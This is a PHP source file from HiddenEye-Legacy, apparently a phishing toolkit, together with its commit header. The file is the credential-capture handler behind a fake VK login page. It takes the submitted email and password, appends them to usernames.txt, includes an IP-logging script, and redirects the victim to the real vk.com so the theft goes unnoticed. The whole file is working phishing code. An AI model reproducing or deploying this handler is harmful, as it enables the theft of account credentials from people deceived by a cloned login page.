HiddenEye-Legacy/WebPages/VK/post.php
Alexey Mozzhakov 3cbb7c6e3b
Changed post to redirect to desktop version
(mobile devices will still be redirected to m.vk.com by vk)
2018-06-28 10:21:46 +03:00

7 lines
187 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://vk.com');
exit();